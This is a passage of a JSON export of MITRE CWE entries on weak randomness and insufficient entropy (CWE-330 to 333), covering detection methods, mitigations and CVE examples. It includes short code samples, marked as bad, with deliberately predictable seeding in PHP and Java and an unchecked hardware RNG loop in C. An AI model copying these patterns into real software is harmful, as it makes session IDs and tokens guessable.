Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic.","Attach the monitor to the process and look for library functions that indicate when randomness is being used. Run the process multiple times to see if the seed changes. Look for accesses of devices or equivalent resources that are commonly used for strong (or weak) randomness, such as /dev/urandom on Linux. Look for library or system calls that access predictable information such as process IDs and system time."]}},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Man-in-the-middle attack tool"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":{"xhtml:p":["Use a well-vetted algorithm that is currently considered to be strong by experts in the field, and select well-tested implementations with adequate length seeds.","In general, if a pseudo-random number generator is not advertised as being cryptographically secure, then it is probably a statistical PRNG and should not be used in security-sensitive contexts.","Pseudo-random number generators can produce predictable numbers if the generator is known and the seed can be guessed. A 256-bit seed is a good starting point for producing a \\"random enough\\" number."]}},{"Phase":"Implementation","Description":"Consider a PRNG that re-seeds itself as needed from high quality pseudo-random output sources, such as hardware devices."},{"Phase":"Testing","Description":"Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible."},{"attr":{"@_Mitigation_ID":"MIT-2"},"Phase":["Architecture and Design","Requirements"],"Strategy":"Libraries or Frameworks","Description":"Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems. Consult FIPS 140-2 Annex C (\\"Approved Random Number Generators\\")."},{"Phase":"Testing","Description":"Use tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-45"},"Intro_Text":"This code attempts to generate a unique random identifier for a user\'s session.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function generateSessionID($userID){}","xhtml:div":{"#text":"srand($userID);return rand();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":["Because the seed for the PRNG is always the user\'s ID, the session ID will always be the same. An attacker could thus predict any user\'s session ID and potentially hijack the session.","This example also exhibits a Small Seed Space (CWE-339)."]},{"attr":{"@_Demonstrative_Example_ID":"DX-46"},"Intro_Text":"The following code uses a statistical PRNG to create a URL for a receipt that remains active for some period of time after a purchase.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String GenerateReceiptURL(String baseUrl) {}","xhtml:div":{"#text":"Random ranGen = new Random();ranGen.setSeed((new Date()).getTime());return(baseUrl + ranGen.nextInt(400000000) + \\".html\\");","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"This code uses the Random.nextInt() function to generate \\"unique\\" identifiers for the receipt pages it generates. Because Random.nextInt() is a statistical PRNG, it is easy for an attacker to guess the strings it generates. Although the underlying design of the receipt system is also faulty, it would be more secure if it used a random number generator that did not produce predictable receipt identifiers, such as a cryptographic PRNG."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-3278","Description":"Crypto product uses rand() library function to generate a recovery key, making it easier to conduct brute force attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3278"},{"Reference":"CVE-2009-3238","Description":"Random number generator can repeatedly generate the same value.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3238"},{"Reference":"CVE-2009-2367","Description":"Web application generates predictable session IDs, allowing session hijacking.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2367"},{"Reference":"CVE-2009-2158","Description":"Password recovery utility generates a relatively small number of random passwords, simplifying brute force attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2158"},{"Reference":"CVE-2009-0255","Description":"Cryptographic key created with a seed based on the system time.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0255"},{"Reference":"CVE-2008-5162","Description":"Kernel function does not have a good entropy source just after boot.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5162"},{"Reference":"CVE-2008-4905","Description":"Blogging software uses a hard-coded salt when calculating a password hash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4905"},{"Reference":"CVE-2008-4929","Description":"Bulletin board application uses insufficiently random names for uploaded files, allowing other users to access private files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4929"},{"Reference":"CVE-2008-3612","Description":"Handheld device uses predictable TCP sequence numbers, allowing spoofing or hijacking of TCP connections.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3612"},{"Reference":"CVE-2008-2433","Description":"Web management console generates session IDs based on the login time, making it easier to conduct session hijacking.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2433"},{"Reference":"CVE-2008-0166","Description":"SSL library uses a weak random number generator that only generates 65,536 unique keys.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0166"},{"Reference":"CVE-2008-2108","Description":"Chain: insufficient precision causes extra zero bits to be assigned, reducing entropy for an API function that generates random numbers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2108"},{"Reference":"CVE-2008-2108","Description":"Chain: insufficient precision (CWE-1339) in\\n\\t     random-number generator causes some zero bits to be reliably\\n\\t     generated, reducing the amount of entropy (CWE-331)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2108"},{"Reference":"CVE-2008-2020","Description":"CAPTCHA implementation does not produce enough different images, allowing bypass using a database of all possible checksums.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2020"},{"Reference":"CVE-2008-0087","Description":"DNS client uses predictable DNS transaction IDs, allowing DNS spoofing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0087"},{"Reference":"CVE-2008-0141","Description":"Application generates passwords that are based on the time of day.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0141"}]},"Functional_Areas":{"Functional_Area":["Cryptography","Authentication","Session Management"]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Randomness and Predictability"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Insecure Randomness"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A2","Entry_Name":"Broken Access Control","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"CON33-C","Entry_Name":"Avoid race conditions when using library functions","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC30-C","Entry_Name":"Do not use the rand() function for generating pseudorandom numbers","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC32-C","Entry_Name":"Properly seed pseudorandom number generators","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":11,"Entry_Name":"Brute Force"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":18,"Entry_Name":"Credential/Session Prediction"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MSC02-J","Entry_Name":"Generate strong random numbers"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"112"}},{"attr":{"@_CAPEC_ID":"485"}},{"attr":{"@_CAPEC_ID":"59"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-267"}},{"attr":{"@_External_Reference_ID":"REF-207"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 8, &#34;Using Poor Random Numbers&#34; Page 259"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 20: Weak Random Numbers.&#34; Page 299"}}]},"Notes":{"Note":[{"#text":"This can be primary to many other weaknesses such as cryptographic errors, authentication errors, symlink following, information leaks, and others.","attr":{"@_Type":"Relationship"}},{"#text":"As of CWE 4.3, CWE-330 and its descendants are being\\n\\t\\t\\t  investigated by the CWE crypto team to identify gaps\\n\\t\\t\\t  related to randomness and unpredictability, as well as\\n\\t\\t\\t  the relationships between randomness and cryptographic\\n\\t\\t\\t  primitives.  This \\"subtree analysis\\" might\\n\\t\\t\\t  result in the addition or deprecation of existing\\n\\t\\t\\t  entries; the reorganization of relationships in some\\n\\t\\t\\t  views, e.g. the research view (CWE-1000); more consistent\\n\\t\\t\\t  use of terminology; and/or significant modifications to\\n\\t\\t\\t  related entries.","attr":{"@_Type":"Maintenance"}},{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t   predictability can vary widely. Within the developer and other\\n\\t   communities, \\"randomness\\" is used heavily. However, within\\n\\t   cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t   measurement. There are no commonly-used definitions, even within\\n\\t   standards documents and cryptography papers. Future versions of\\n\\t   CWE will attempt to define these terms and, if necessary,\\n\\t   distinguish between them in ways that are appropriate for\\n\\t   different communities but do not reduce the usability of CWE for\\n\\t   mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Background_Details, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Description, Likelihood_of_Exploit, Other_Notes, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Observed_Examples, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Detection_Factors, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Functional_Areas, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples, Maintenance_Notes, Observed_Examples"}],"Previous_Entry_Name":{"#text":"Randomness and Predictability","attr":{"@_Date":"2008-04-11"}}}},"331":{"attr":{"@_ID":"331","@_Name":"Insufficient Entropy","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses an algorithm or scheme that produces insufficient entropy, leaving patterns or clusters of values that are more likely to occur than others.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"330","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"330","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Other"],"Impact":["Bypass Protection Mechanism","Other"],"Note":"An attacker could guess the random numbers generated and could gain unauthorized access to a system if the random numbers are used for authentication and authorization."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Determine the necessary entropy to adequately provide for randomness and predictability. This can be achieved by increasing the number of bits of objects such as keys and seeds."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-45"},"Intro_Text":"This code generates a unique random identifier for a user\'s session.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function generateSessionID($userID){}","xhtml:div":{"#text":"srand($userID);return rand();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":["Because the seed for the PRNG is always the user\'s ID, the session ID will always be the same. An attacker could thus predict any user\'s session ID and potentially hijack the session.","This example also exhibits a Small Seed Space (CWE-339)."]},{"attr":{"@_Demonstrative_Example_ID":"DX-46"},"Intro_Text":"The following code uses a statistical PRNG to create a URL for a receipt that remains active for some period of time after a purchase.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String GenerateReceiptURL(String baseUrl) {}","xhtml:div":{"#text":"Random ranGen = new Random();ranGen.setSeed((new Date()).getTime());return(baseUrl + ranGen.nextInt(400000000) + \\".html\\");","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"This code uses the Random.nextInt() function to generate \\"unique\\" identifiers for the receipt pages it generates. Because Random.nextInt() is a statistical PRNG, it is easy for an attacker to guess the strings it generates. Although the underlying design of the receipt system is also faulty, it would be more secure if it used a random number generator that did not produce predictable receipt identifiers, such as a cryptographic PRNG."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-0950","Description":"Insufficiently random data used to generate session tokens using C rand(). Also, for certificate/key generation, uses a source that does not block when entropy is low.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0950"},{"Reference":"CVE-2008-2108","Description":"Chain: insufficient precision (CWE-1339) in\\n\\t     random-number generator causes some zero bits to be reliably\\n\\t     generated, reducing the amount of entropy (CWE-331)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2108"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Insufficient Entropy"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":11,"Entry_Name":"Brute Force"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC32-C","Entry_Name":"Properly seed pseudorandom number generators","Mapping_Fit":"Exact"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"59"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-207"}}},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t   predictability can vary widely. Within the developer and other\\n\\t   communities, \\"randomness\\" is used heavily. However, within\\n\\t   cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t   measurement. There are no commonly-used definitions, even within\\n\\t   standards documents and cryptography papers. Future versions of\\n\\t   CWE will attempt to define these terms and, if necessary,\\n\\t   distinguish between them in ways that are appropriate for\\n\\t   different communities but do not reduce the usability of CWE for\\n\\t   mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Maintenance_Notes, Observed_Examples"}]}},"332":{"attr":{"@_ID":"332","@_Name":"Insufficient Entropy in PRNG","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The lack of entropy available for, or used by, a Pseudo-Random Number Generator (PRNG) can be a stability and security threat.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"331","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"If a pseudo-random number generator is using a limited entropy source which runs out (if the generator fails closed), the program may pause or crash."},{"Scope":["Access Control","Other"],"Impact":["Bypass Protection Mechanism","Other"],"Note":"If a PRNG is using a limited entropy source which runs out, and the generator fails open, the generator could produce predictable random numbers. Potentially a weak source of random numbers could weaken the encryption method used for authentication of users."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-2"},"Phase":["Architecture and Design","Requirements"],"Strategy":"Libraries or Frameworks","Description":"Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems. Consult FIPS 140-2 Annex C (\\"Approved Random Number Generators\\")."},{"Phase":"Implementation","Description":"Consider a PRNG that re-seeds itself as needed from high-quality pseudo-random output, such as hardware devices."},{"Phase":"Architecture and Design","Description":"When deciding which PRNG to use, look at its sources of entropy. Depending on what your security needs are, you may need to use a random number generator that always uses strong random data -- i.e., a random number generator that attempts to be strong but will fail in a weak way or will always provide some middle ground of protection through techniques like re-seeding. Generally, something that always provides a predictable amount of strength is preferable."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2019-1715","Description":"security product has insufficient entropy in the DRBG, allowing collisions and private key discovery","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1715"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Insufficient entropy in PRNG"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MSC02-J","Entry_Name":"Generate strong random numbers"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-267"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t   predictability can vary widely. Within the developer and other\\n\\t   communities, \\"randomness\\" is used heavily. However, within\\n\\t   cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t   measurement. There are no commonly-used definitions, even within\\n\\t   standards documents and cryptography papers. Future versions of\\n\\t   CWE will attempt to define these terms and, if necessary,\\n\\t   distinguish between them in ways that are appropriate for\\n\\t   different communities but do not reduce the usability of CWE for\\n\\t   mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Maintenance_Notes"}]}},"333":{"attr":{"@_ID":"333","@_Name":"Improper Handling of Insufficient Entropy in TRNG","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"True random number generators (TRNG) generally have a limited source of entropy and therefore can fail or block.","Extended_Description":"The rate at which true random numbers can be generated is limited. It is important that one uses them only when they are needed for security.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"331","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"A program may crash or block if it runs out of random numbers."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Rather than failing on a lack of random numbers, it is often preferable to wait for more numbers to be created."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code uses a TRNG to generate a unique session id for new connections to a server:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"while (1){","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (haveNewConnection()){","xhtml:div":{"#text":"if (hwRandom()){} } }","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int sessionID = hwRandom();createNewConnection(sessionID);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}}}},"Body_Text":"This code does not attempt to limit the number of new connections or make sure the TRNG can successfully generate a new random number. An attacker may be able to create many new connections and exhaust the entropy of the TRNG. The TRNG may then block and cause the program to crash or hang."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure of TRNG"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MSC02-J","Entry_Name":"Generate strong random 